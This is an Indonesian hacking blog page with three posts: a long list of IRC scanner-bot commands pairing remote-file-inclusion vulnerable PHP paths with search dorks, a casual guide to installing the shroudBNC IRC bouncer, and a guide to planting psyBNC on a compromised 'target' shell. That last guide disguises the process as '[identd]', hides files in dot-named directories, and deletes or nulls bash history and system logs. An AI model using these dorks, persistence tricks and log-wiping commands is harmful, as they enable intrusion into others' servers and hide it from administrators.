Senin, 04 Oktober 2010

Bug Dork

.scan /index.php?_SERVER[DOCUMENT_ROOT]=powered by Clicknet CMS
.scan /include/admin.lib.inc.php?site_path=rgboard
.scan /header.php?base_folder=Powered by Bab.stats
.scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=& mosConfig_absolute_path=/index.php?option=com_content
.scan /admin.php?include_path=Guestbook
.scan //main.php?_zb_path=main.php
.scan //login.php?_zb_path=login.php
.scan /////?_SERVER[DOCUMENT_ROOT]=/board site:.kr
.scan /admin.php?include_path=gastenboek
.scan /docebo/doceboLms//class/class.dashboard_lms.php?where_framework=doceboLms
.scan /encapscms_PATH/core/core.php?root=encapscms 0.3.6aE3encapscms 0.3.6aE3
.scan PNphpBB2/includes/functions_admin.php?phpbb_root_path=/PNphpBB2/
.scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=PHP-NUKE
.scan /s_loadenv.inc.php?DOCUMENT_ROOT=netcat require
.scan /index.php?DOCUMENT_ROOT=netcat_files
.scan /ray.3.5/modules/global/inc/content.inc.php?sIncPath=boonex
.scan /?page= /?pagedb=?
.scan ?sourcedir= index.php?sourcedir=
.scan /security/include/_class.security.php?PHPSECURITYADMIN_PATH=web3news
.scan /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=/plugins/sniplets/
.scan /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=powerd by wordpress
.scan /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=contenido
.scan /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=phpraider
.scan /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=phpbb3aE3
.scan /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=PhpRaider Mod phpbb3aE3
.scan /admin/templates/template_thumbnail.php?thumb_template=homePH design
.scan /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=index.php?option=com_dbquery
.scan /administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=com_competitions atau/components/com_competitions/
.scan /administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=com_feederator
.scan /assets/snippets/reflect/snippet.reflect.php?reflect_base=aEsMODx CMS
.scan /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=dm-albums
.scan /mygallery/myfunctions/mygallerybrowser.php?myPath=inurl:/mygallery/myfunctions/
.scan /mygallery/myfunctions/mygallerybrowser.php?myPath=Index of /mygallery/myfunctions
.scan /mygallery/myfunctions/mygallerybrowser.php?myPath=inurl:mygallerytmpl.php
.scan //skin/buzzard_espoon/setup.php?dir=skin by buzzard
.scan //skin/daerew_DICAgallery_GD/setup.php?dir=skin by daerew
.scan //skin/happycast_category_lightblack/setup.php?dir=skin by zetyx
.scan //skin/uks_gallery_v3010//write.php?dir=skin by uks
.scan //skin/ggambo7002_board/setup.php?dir=skin by GGAMBO
.scan //skin/ggambo7002_board/modify.php?dir=skin by GGAMBO
!scan become_editor.php?theme_path= become_editor.php
!scan bad_link.php?theme_path= bad_link.php
!scan webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini= webmail/lib/emailreader_execute_on_each_page.inc.php
!scan mantis/login_page.php?g_meta_include_file= mantis/login_page.php
!scan /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=index.php?name=PNphpBB2?
!scan /index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=Forgotten your password?+No account yet?
!scan /plugins/safehtml/HTMLSax3.php?dir[plugins]= %22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+
!scan redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=/index.php?article_id=8aE3/index.php?article_id=8aE3
!scan /bookmark4u/lostpasswd.php?env[include_prefix]=bookmark4u
!scan ?custompluginfile[]=index.php?categoryid=1aE3
!scan ?view=page&pagename=Buy, sell, trade, date, eventsaE| post anything
!scan modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=topgroupname
!scan /cms/system/openengine.php?oe_classpath=/cms/website.php?
!scan /popup.php?path=erstellt mit PHPKIT
!scan /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=includes/mambo.php *fr*
!scan /bbs//skin/zero_vote/ask_password.php?dir=zeroboard+zboard+board+bbs *.kr
!scan index.php?go= inurl:index.php?go=
!scan /stats.php?dir[func]=&dir[base]=mygamingladdermy gaming ladder
!scan protection.php?action=logout&siteurl= PHPFanBase
!scan /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=/board.php?board=
!scan /comments.php?id={${include($ddd)}}{${exit()}}&ddd=poll_ssi.php
!scan ///?_SERVER[DOCUMENT_ROOT]= /redaxo/include/addons/
!scan /?sIncPath=/index.php?members_mode=top
!scan /common/db.php?commonpath=playing.php
!scan includes/class_item.php?fileExtension=Recently Listed Wanted Ads
!scan error.php?dir=category_head.php
!scan error.php?dir= ask_password.php
!scan ////////?cmd&file=index.php?cmd=10?
!rfi /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path= com_lurm_constructor -p 100
!scan /?sIncPath=BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More.
!scan historytemplate.php?cms[support]=1&cms[tngpath]= historytemplate.php
!scan /kboard.php?board=sightseein
Diposting oleh di Tidak ada komentar:

Cara Membuat ShroudBNC

Bagaimana cara membuat atau menginstall shroudBNC atau singkat aje jadi sBNC. Cara install sBNC ini gua pake sBNC versi 1.1, sekaligus ntar gua kasih link buat download file sBNC nya, tau ntar kalo sempet gua upload ke file pribadi aje hehehehhehheehheh . . .
yupz kebanyakan ngomong nih, langsung aje yak??
- Persiapan
(kate orang kalo gak ada persiapan aktifitas tuh jareng ade yang sukses )
ok persiapannya sederhana aje :
1. PC / Laptop, ya iyalah, kalo gak ada PC / Laptop mane bise install , kalo gak punya, ke warnet aje cuy, sekarang kan warnet banyak yang murah exexexexexex.....

2. sedia vodka atau ciu, lah, kalo gak minum kurang mantap, kwakawkawkawkakwkaw

3. Rokok, Nah kalo ga ada rokok ni mah repot banget.....harus ada rokok biar ga pusing....asdasdasdasd

4. Putty, Buat yang pake OS windows pake nih putty, fungsinya hampir sama kayak DOS, tapi yang ini kayak OS server Linux/Unix/BSD Online gitu, kita pake nya ntar lewat SSH.

5. Shell, Nah ini yang penting banget, shell. karena kita buat sBNC nya lewat shell.
gua saranin pake shell yang legal yak, tapi terserah oe mo install sBNC nya lewat shell ijekan atau legal. zzzzzz kalo ada bagi donk memo ke nick saya lah ato gimana gitu /ms send mamo (shell mu) kapwkoawkaowpkpowkak~~~


1. Biar sukses installnya Minum se sloki Ntuh VOdkanya dulu.
kalo udah Loe login ke shell loe pake putty ( legal shell )
2. truz download sBNc nya.
bisa pake wget, fetch, lwp-download, curl -f -O.
contoh:
wget http://mirror.shroudbnc.info/sbnc-1.1.tar.gz
kalo gak bisa wget, pake fetch , lwp-download , atau curl -f -O
3. udah di download langsung ekstrak sBNC nya.
caranya pake: tar -zvxf sbnc-1.1.tar.gz
->> minum dulu tuh lagi Vodka nya atau isep tuh rokok loe
4. na truz loe masuk ke direktori sBNC hasil ekstrak tadi
caranya pake: cd sbnc-1.1
5. truz konfigurasi sBNc nya
caranya: ketik ./configure
buat yang gagal configure mungkin karena shell yg loe pake di disable ma admin.
->> minum lagi dulu tuh Vodka nya atau isep lagi tuh rokok loe
6. kalo udah berhasil kofigurasinya lansung ketik: gmake
7. truz ketik lagi : gmake install
->> lagi lagi minum Vodkanya Kalo udah agak nge Fly stop dulu kawpokawopawkop....
8. kalo udah ntar ada direktori baru yang bernama "sbnc" letaknya di home/ramonez/sbnc ada di sebelah direktori sbnc-1.1. loe bisa ketik: cd .. atau juga bisa ketik cd ~/sbnc atau cd /home/ramonez/sbnc
buat yang belum hapal bener command linux kayak gua , gua saranin ketik: cd .. aje
9. kita anggap udah masuk ke direktori sbnc yak.
nah truz loe ketik: ./conftool
ntar ada tampilan kayak gini
==================================================================
This utility will automatically generate a suitable configuration
for you once it has asked you some questions.
1. Which port should the bouncer listen on? [9000] <-- ini loe isi port buat sbnc
2. What should the first user's name be? <-- loe isi ident buat sbnc nya
3. Please enter a password for the first user: <-- nah ini pasti tau kan. yups isi password
Writing config...
==================================================================
10. terakhit buat run atau jalanin sbnc nya.
cukup ketik: ./sbnc
11. biar sBNC nya cuma 1 proses jangan lupa restart sBNCnya ketik: ./sbnc --lps
Jalan deh sbnc nya, sekarang loe bisa tes di mirc kesayangan loe.
contoh server shell, ident sama passwordnya.
server : nama.shell.elu
port : 1234
ident : admin
passwd : sbncadmin
ircserv: irc.telkom.net.id
ircport: 6667

[19:24] * Connecting to nama.shell.elu (1234)
[19:24] -
[19:24] -Notice- *** shroudBNC1.1 $Revision: 371 $
[19:24] -
[19:24] -Notice- *** Looking up your hostname
[19:24] -
[19:24] -Notice- *** Failed to resolve your host. Using IP address instead (127.0.0.1)
ntar lo bakalan di pv/pm oleh -sBNC , sama kayak psyBNc, kayak gini nih:
Session Start: Thu jul 02 19:24:27 2009
Session Ident: -sBNC
Session Ident: -sBNC (bouncer@shroudbnc.org)
[19:24] <-sBNC> You haven't set a server yet. Use /sbnc set server to do that now.
nah loe, pada buka kamus yak? kekekekeke. .
gini brow, maksute lo blon ngeset irc server nya, na truz gmn cara ngeset irc servernya? gampang kok, ketik aje /sbnc set server
contoh: /sbnc set server irc.telkom.net.id 6667
kalo loe pengen pake vhost ketik /sbnc set vhost
gak pake contoh, banyak di google
buat perintah laennya ketik aje : /sbnc help
setiap kali perintah di set dengan benar, sbnc nya bakalan ngerespon kayak gini.
[19:24] <-sBNC> Done.
na sekarang tinggal nunggu respon dari sbnc
[19:32] <-sBNC> Scheduled reconnect in 120 seconds.
[19:25] set server irc.telkom.net.id 6667
[19:25] <-sBNC> Scheduled reconnect in 60 seconds.
[19:25] <-sBNC> Done.
[19:32] <-sBNC> Scheduled reconnect in 120 seconds.
[19:32] <-sBNC> You have new messages. Use '/msg -sBNC read' to view them.
[19:32] erase
[19:32] <-sBNC> Done.
Session Close: Thu Jul 02 19:33:23 2009

sekarang tinggal loe join ke chanel kesayangan loe, contoh: #ndolly
nb: perintah gak mesti di ketik /sbnc tapi kalo mo simpel ketik aja ' set ' di pv an sbnc.
server shell, port, idetnd, password sbnc gua ganti biar loe gak cobain shell gua

Perintah singkat install ShroudBNC versi 1.1:
1) wget http://mirror.shroudbnc.info/sbnc-1.1.tar.gz
2) tar -zvxf sbnc-1.1.tar.gz
3) cd sbnc-1.1
4) ./configure
5) gmake
4) make install
6) cd ..
7) cd sbnc
8) ./conftool
isi port, identd, password
9) ./sbnc
10) ./sbnc --lps
sep dah, selesai moga bermanfaat ya.
Diposting oleh di Tidak ada komentar:

Cara Membuat Psybnc Dari Shell/Target Dari scanner 

mkdir "...." <<-- ini dia direktori kita setelah itu kita masuk
ke direktori tersebut
cd "...." <<-- masuk ke direktori
wget wget http://www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh
tar -zxvf .sh
mv psybnc .log
cd .log
make
echo "PSYBNC.SYSTEM.PORT1=110"  >> user.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> user.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> user.conf
pwd
/home/scut/..../.log
ketik command:
PATH=$PATH:/home/scut/"...."/.log
mv psybnc "[identd] "
mv scut.conf "  "
"[identd] " "  " 

 .-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
 ,----.,----.,-. ,-.,---.,--. ,-.,----.
 | O || ,-' \ \/ / | o || \| || ,--'
 | _/ _\ \ \ / | o< | |\ || |__
 |_| |____/ |__| |___||_| \_| \___|
 Version 2.2.1 (c) 1999-2000  the most psychoid  and the cool lam3rz Group IRCnet
 `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
 Configuration File:
 No logfile specified, logging to log/psybnc.log
 Listening on: 0.0.0.0 port 11111
 psyBNC2.2.1-cBtITLdDMSNp started (PID 2291)
 [scut@d11303 .log]$

 ps -x untuk mengetahui proses  di background shell
 [scut@d11303 .log]$ ps -x
 PID TTY STAT TIME COMMAND
 31544 ? S 0:16 ./bash
 31629 ? S 0:06 sendmail to scut
 2212 pts/1 S 0:00 -bash
 2291 pts/1 S 0:00 [identd]
 2309 pts/1 R 0:00 ps -x
 catatan: 2291 pts/1 S 0:00 [identd] <<-- ini adalah background
 psybnc anda yang berubah setelah kita lakukan trik tersebut namun
jangan keburu gembira dahulu, karena mungkin admin curiga dengan
 background yang ada di server tersebut dan admin akan mencarinya
 dengan:

find | grep psybnc <<-- kemungkinan yang dilakukan
karena biasanya admin tahu kalau user selalu run psybnc
 maka akan nampak nama nama psybnc anda
./log/psybnc.log
./log/psybnc.log.old
./psybncchk
./psybnc.pid

Untuk itu kita perlu mengganti nama nama tersebut
dengan yang lain semisal
[scut@d11303 .log]$ mv psybnc.pid .log
[scut@d11303 log]$ mv psybnc.log .sh
[scut@d11303 log]$ mv psybnc.log.old .mud

Dengan cara tersebut kemungkinan sang admin nggak akan curiga
 terhadap background yang ada di server anda ;)
dan yang terakhir jangan lupa bersihkan log anda
dengan mengetik command:
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
Diposting oleh di Tidak ada komentar:
Langganan: Postingan (Atom)